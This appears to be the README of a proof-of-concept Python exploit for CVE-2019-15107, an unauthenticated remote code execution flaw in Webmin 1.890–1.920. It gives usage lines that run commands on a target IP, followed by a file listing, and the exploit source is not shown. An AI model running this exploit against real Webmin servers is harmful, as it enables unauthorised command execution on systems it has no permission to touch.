Exploit para CVE-2019-15107 (Webmin 1.890-1.920) sin credenciales RCE escrito en PYTHON.# CVE-2019-15107 Python Exploit
This exploit is for CVE-2019-15107 (Webmin 1.890-1.920) **unauthenticated RCE** implemented in **Python**.
# Usage
```python
python3 webminExploit.py <IP> <PORT> <COMMAND>
python3 webminExploit.py 10.200.198.200 10000 whoami
python3 webminExploit.py 10.200.198.200 10000 "curl -h"
```
[4.0K] /data/pocs/b172e02344fbe0c3bbb4f971c0a8d65202d2f4e8
├── [ 322] README.md
└── [1.1K] webminExploit.py
0 directories, 2 files